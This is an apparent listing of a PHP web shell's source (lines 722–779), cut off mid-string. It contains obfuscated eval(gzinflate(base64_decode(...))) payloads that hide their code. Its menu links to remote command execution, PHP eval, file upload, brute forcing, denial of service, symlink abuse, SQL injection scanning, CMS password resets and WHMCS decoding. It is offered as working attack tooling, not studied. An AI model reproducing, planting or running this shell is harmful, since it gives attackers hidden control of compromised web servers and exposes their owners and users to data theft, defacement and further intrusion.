RTj3ImV9C5LXS49nyjeRgJSxTIkdl9p8RTT9WkqrlF1Csna5KPR7jL8W30akP/Lbe2Vw/UCj2i1yxbGqHb/Vt/gYNaMV7mNp7VbZj2WSI0ry6uzq6MZ8A89E0Bi+QVLEbs3nsjWuXvGY+MyrzjqrWbE7r0o39JZDaYEOvjZSNg8p53Wnl5/y4wsWt5LVLBssCMH9NM6xaGCWOZHtzIOS+lzhB6dXzMQREUwWmAzETv7O206fFqknlMuU/GaOSS86+R5uSalLH7FFsp1fnw4Au8cc5eiUaeHpjEiJf8BONNMe/S5YpWTS6LEL+u0J+n0mvhdNplF+FtYR+yF3L3AAANfKr5RMep31/B3QZt2yZsKxSz+k8u8dBcscBMFhIsEpkkOQ/j0g6EP/+eeff/75r3/89d9///V/')))); ?>
  722.                             </tr>
  723.                             <tr>
  724.                                 <? eval(gzinflate(base64_decode('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'))); ?>
  725.                             </tr>
  726.                         </table>
  727.                     </td>
  728.                     <td>
  729.                         <?php echo $buff; ?>
  730.                     </td>
  731.                 </tr>
  732.             </table>   
  733.         </div>
  734.         <!-- head info end here -->
  735.         <!-- menu start -->
  736.             <div id="menu">
  737.             <center>
  738.             <a href="?<?php echo "y=".$pwd; ?>">            <b>Explore</b></a>
  739.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">    <b>Shell</b></a>
  740.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">      <b>Eval</b></a>
  741.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">    <b>MySQL</b></a>
  742.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">  <b>PHP</b></a>
  743.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">    <b>NetSploit</b></a>
  744.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">   <b>Upload</b></a>
  745.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">     <b>Mail</b></a>
  746.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=brute">    <b>BruteForce</b></a>
  747.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=readable"> <b>OpenDIR</b></a>
  748.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=dos">      <b>D0S</b></a><br><br>
  749.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=localdomain">  <b>LocalDomain</b></a>
  750.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=zone-h">        <b>Zone-H</b></a>
  751.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">        <b>Symlink</b></a>
  752.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=identify">        <b>Domain Script</b></a>
  753.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner">        <b>SQLI Scan</b></a>
  754.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=web-info">        <b>Website Whois</b></a>
  755.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=port-scanner">        <b>Port-Scanner</b></a>
  756.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">        <b>WP Reset</b></a><br><br>
  757.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">        <b>Jomlaa Reset</b></a>
  758.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=cms-scanner">        <b>CMS Scanner</b></a>
  759.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=vb">        <b>VB Changer</b></a>
  760.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=string-encode">        <b>String Encoder</b></a>
  761.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysqlbackup">  <b>SQL Backup</b></a>
  762.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs">        <b>WHMCS Decoder</b></a>
  763.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=security-mode">        <b>Security Mode</b></a>
  764.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=process">        <b>Process</b></a>
  765.             </center>
  766.         </div>
  767.             <!-- menu end -->
  768.            
  769.            
  770.         <?php
  771.         if(isset($_GET['x']) && ($_GET['x'] == 'php'))
  772.             {
  773.             ?>
  774. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  775. <table class="cmdbox">
  776.  
  777. <tr>
  778. <td>
  779. <textarea class="output" name="cmd" id="cmd"><? eval(gzinflate(base64_decode('FZfHsoPYFUV/xbNuFwNyKtvdRc45M3GRcxBJwNdb1uhVSUg87jl7r/X3X//++x/VlY1/Nm8312N2VH/ux/bfbTlg9M882ysC+29ZFUtZ/fmHmK4BT9ofMfHBEJlwwTkO96MWUH6tGWu739qt6hmlcqsQ2Y2G3v1L7RcIkCgIgKO7rxdc0+VpeSp44iGYXxfezdGQgN6RHLjOgMMnAIIqqEFYioIZr4DXjZu6kaVHzEh6rSxLqDcP8gixjF0msxYFYk9pZV6ZVTDcgS0sOhSjcRQhBHR/qkohI/0BwdokHYPIufFv0JZqLlJGPpZqwzDbMZ+Y3I8slQK8OclaE1hv6yh2DoE8tPn2kxJw7jAvDNtFgKPA5/5cx0SMRHsIp7Ai2FBXsFLQ9A3rW5LNOMQk2lPU+DpmM6XIJPOcEvWshHvX9WNb7mMdafviD2JBvNMJw5pwk2Xt/lfCMNJHjuDGH/l0ElWirAoLr9wMnrqf95z2lCOXgn6F0CT2/fvAt9ujZKgXDpla9JqbBoJ47vh4K/82PlC/EvTq2Bf2kO8smhaXzxs2yzwPJKI/QBabEoKyrL/3nJrXdNR/WErpv8V9AJr9mLtLELthbznczWg8XhUG88/qQ1HofQz2xWrFN26qbKrYNh2T+BK7qo5Z19wIH9sTY1I5jhbuJfaZGXUiyKKhUwyaus1xUFlZBpetenLKMRQcnfc8z9vKM4hpxuKYc3ci7nCIW9fpobdQJMNGx+rysJfniz3qlfghUTgtPOBISldYNtDzN8BnFtXS4E1Olv79ynmCKPl010HE+JwYi7nvE03Qo3Mt/KaWY1bUdgtMjUpgycdXC8prQ/pjkqhApIKjypJ4NTPdrFVNAtf27JwnFJUPuQHOaP1mFNge1g2oiEmyxGe1BEMxZ